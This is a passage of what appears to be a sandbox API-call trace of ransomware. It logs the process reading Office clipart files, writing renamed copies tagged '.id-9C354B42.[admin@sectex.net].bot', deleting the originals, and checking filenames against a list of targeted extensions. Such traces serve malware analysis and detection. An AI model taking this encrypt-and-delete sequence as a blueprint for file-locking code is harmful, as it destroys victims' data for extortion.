	[0157.802] WriteFile (in: hFile=0x29c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0157.802] SetEndOfFile (hFile=0x29c) returned 1
	[0157.802] CloseHandle (hObject=0x29c) returned 1
	[0157.802] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.802] SetEndOfFile (hFile=0x3c0) returned 1
	[0157.804] CloseHandle (hObject=0x3c0) returned 1
	[0157.804] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0157.805] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105294.wmf")) returned 1
	[0157.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.805] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.805] lstrlenW (lpString=".doc") returned 4
	[0157.805] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.805] lstrlenW (lpString=".docx") returned 5
	[0157.805] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0157.805] lstrlenW (lpString=".pdf") returned 4
	[0157.805] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.805] lstrlenW (lpString=".xls") returned 4
	[0157.805] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.805] lstrlenW (lpString=".xlsx") returned 5
	[0157.806] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0157.806] lstrlenW (lpString=".ppt") returned 4
	[0157.806] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.806] lstrlenW (lpString=".zip") returned 4
	[0157.806] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.806] lstrlenW (lpString=".rar") returned 4
	[0157.806] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.806] lstrlenW (lpString=".bz2") returned 4
	[0157.806] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.806] lstrlenW (lpString=".7z") returned 3
	[0157.806] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.806] lstrlenW (lpString=".dbf") returned 4
	[0157.806] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.806] lstrlenW (lpString=".1cd") returned 4
	[0157.806] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.806] lstrlenW (lpString=".jpg") returned 4
	[0157.806] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.806] lstrlenW (lpString=".doc") returned 4
	[0157.806] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.806] lstrlenW (lpString=".docx") returned 5
	[0157.806] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1
	[0157.806] lstrlenW (lpString=".pdf") returned 4
	[0157.806] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.806] lstrlenW (lpString=".xls") returned 4
	[0157.806] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.807] lstrlenW (lpString=".xlsx") returned 5
	[0157.807] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1
	[0157.807] lstrlenW (lpString=".ppt") returned 4
	[0157.807] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.807] lstrlenW (lpString=".zip") returned 4
	[0157.807] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.807] lstrlenW (lpString=".rar") returned 4
	[0157.807] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.807] lstrlenW (lpString=".bz2") returned 4
	[0157.807] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.807] lstrlenW (lpString=".7z") returned 3
	[0157.807] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.807] lstrlenW (lpString=".dbf") returned 4
	[0157.807] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.807] lstrlenW (lpString=".1cd") returned 4
	[0157.807] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.807] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105294.WMF") returned 63
	[0157.807] lstrlenW (lpString=".jpg") returned 4
	[0157.807] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.807] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0157.807] lstrlenW (lpString="J0105306.WMF") returned 12
	[0157.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105306.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0157.808] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=4320) returned 1
	[0157.808] CloseHandle (hObject=0x3c0) returned 1
	[0157.808] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105306.wmf")) returned 0x20
	[0157.808] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105306.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105306.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0157.809] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.809] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105306.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x29c
	[0157.810] GetLastError () returned 0x0
	[0157.810] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x10e0, lpOverlapped=0x0) returned 1
	[0157.812] WriteFile (in: hFile=0x29c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x10f0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x10f0, lpOverlapped=0x0) returned 1
	[0157.813] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0157.813] WriteFile (in: hFile=0x29c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0157.813] SetEndOfFile (hFile=0x29c) returned 1
	[0157.813] CloseHandle (hObject=0x29c) returned 1
	[0157.813] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.813] SetEndOfFile (hFile=0x3c0) returned 1
	[0157.816] CloseHandle (hObject=0x3c0) returned 1
	[0157.816] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0157.817] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105306.wmf")) returned 1
	[0157.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.817] lstrlenW (lpString=".doc") returned 4
	[0157.817] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.817] lstrlenW (lpString=".docx") returned 5
	[0157.817] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0157.818] lstrlenW (lpString=".pdf") returned 4
	[0157.818] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.818] lstrlenW (lpString=".xls") returned 4
	[0157.818] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.818] lstrlenW (lpString=".xlsx") returned 5
	[0157.818] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0157.818] lstrlenW (lpString=".ppt") returned 4
	[0157.818] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.818] lstrlenW (lpString=".zip") returned 4
	[0157.818] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.818] lstrlenW (lpString=".rar") returned 4
	[0157.818] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.818] lstrlenW (lpString=".bz2") returned 4
	[0157.818] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.818] lstrlenW (lpString=".7z") returned 3
	[0157.818] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.818] lstrlenW (lpString=".dbf") returned 4
	[0157.818] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.818] lstrlenW (lpString=".1cd") returned 4
	[0157.818] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.818] lstrlenW (lpString=".jpg") returned 4
	[0157.818] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.818] lstrlenW (lpString=".doc") returned 4
	[0157.818] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.818] lstrlenW (lpString=".docx") returned 5
	[0157.819] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0157.819] lstrlenW (lpString=".pdf") returned 4
	[0157.819] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.819] lstrlenW (lpString=".xls") returned 4
	[0157.819] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.819] lstrlenW (lpString=".xlsx") returned 5
	[0157.819] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0157.819] lstrlenW (lpString=".ppt") returned 4
	[0157.819] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.819] lstrlenW (lpString=".zip") returned 4
	[0157.819] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.819] lstrlenW (lpString=".rar") returned 4
	[0157.819] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.819] lstrlenW (lpString=".bz2") returned 4
	[0157.819] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.819] lstrlenW (lpString=".7z") returned 3
	[0157.819] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.819] lstrlenW (lpString=".dbf") returned 4
	[0157.819] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.819] lstrlenW (lpString=".1cd") returned 4
	[0157.819] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.819] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105306.WMF") returned 63
	[0157.819] lstrlenW (lpString=".jpg") returned 4
	[0157.819] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.819] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0157.819] lstrlenW (lpString="J0105320.WMF") returned 12
	[0157.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105320.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0157.821] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=2020) returned 1
	[0157.821] CloseHandle (hObject=0x3c0) returned 1
	[0157.821] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105320.wmf")) returned 0x20
	[0157.821] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105320.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105320.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0157.821] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.821] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105320.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x29c
	[0157.822] GetLastError () returned 0x0
	[0157.822] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x7e4, lpOverlapped=0x0) returned 1
	[0157.824] WriteFile (in: hFile=0x29c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x7f0, lpOverlapped=0x0) returned 1
	[0157.825] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0157.825] WriteFile (in: hFile=0x29c, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0157.825] SetEndOfFile (hFile=0x29c) returned 1
	[0157.825] CloseHandle (hObject=0x29c) returned 1
	[0157.825] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.825] SetEndOfFile (hFile=0x3c0) returned 1
	[0157.827] CloseHandle (hObject=0x3c0) returned 1
	[0157.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0157.827] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105320.wmf")) returned 1
	[0157.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.828] lstrlenW (lpString=".doc") returned 4
	[0157.828] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.828] lstrlenW (lpString=".docx") returned 5
	[0157.828] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0157.828] lstrlenW (lpString=".pdf") returned 4
	[0157.828] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.828] lstrlenW (lpString=".xls") returned 4
	[0157.828] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.828] lstrlenW (lpString=".xlsx") returned 5
	[0157.828] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0157.828] lstrlenW (lpString=".ppt") returned 4
	[0157.828] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.828] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.828] lstrlenW (lpString=".zip") returned 4
	[0157.828] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.828] lstrlenW (lpString=".rar") returned 4
	[0157.828] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.828] lstrlenW (lpString=".bz2") returned 4
	[0157.829] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.829] lstrlenW (lpString=".7z") returned 3
	[0157.829] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.829] lstrlenW (lpString=".dbf") returned 4
	[0157.829] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.829] lstrlenW (lpString=".1cd") returned 4
	[0157.829] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.829] lstrlenW (lpString=".jpg") returned 4
	[0157.829] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.829] lstrlenW (lpString=".doc") returned 4
	[0157.829] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0157.829] lstrlenW (lpString=".docx") returned 5
	[0157.829] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1
	[0157.829] lstrlenW (lpString=".pdf") returned 4
	[0157.829] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0157.829] lstrlenW (lpString=".xls") returned 4
	[0157.829] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0157.829] lstrlenW (lpString=".xlsx") returned 5
	[0157.829] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1
	[0157.829] lstrlenW (lpString=".ppt") returned 4
	[0157.829] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0157.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.829] lstrlenW (lpString=".zip") returned 4
	[0157.829] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0157.829] lstrlenW (lpString=".rar") returned 4
	[0157.829] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0157.829] lstrlenW (lpString=".bz2") returned 4
	[0157.830] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0157.830] lstrlenW (lpString=".7z") returned 3
	[0157.830] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0157.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.830] lstrlenW (lpString=".dbf") returned 4
	[0157.830] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0157.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.830] lstrlenW (lpString=".1cd") returned 4
	[0157.830] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0157.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105320.WMF") returned 63
	[0157.830] lstrlenW (lpString=".jpg") returned 4
	[0157.830] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0157.830] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0157.830] lstrlenW (lpString="J0105328.WMF") returned 12
	[0157.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0157.831] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0xa2cff1c | out: lpFileSize=0xa2cff1c*=7992) returned 1
	[0157.831] CloseHandle (hObject=0x3c0) returned 1
	[0157.831] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf")) returned 0x20
	[0157.831] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0157.831] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.831] SetFilePointerEx (in: hFile=0x3c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105328.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105328.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0158.410] GetLastError () returned 0x0
	[0158.410] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x1f38, lpOverlapped=0x0) returned 1
	[0158.472] WriteFile (in: hFile=0x3e8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0x1f40, lpOverlapped=0x0) returned 1
	[0158.473] ReadFile (in: hFile=0x3c0, lpBuffer=0xae50020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa2cfed4, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesRead=0xa2cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0158.473] WriteFile (in: hFile=0x3e8, lpBuffer=0xae50020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa2cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xae50020*, lpNumberOfBytesWritten=0xa2cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0158.473] SetEndOfFile (hFile=0x3e8) returned 1
	[0158.473] CloseHandle (hObject=0x3e8) returned 1
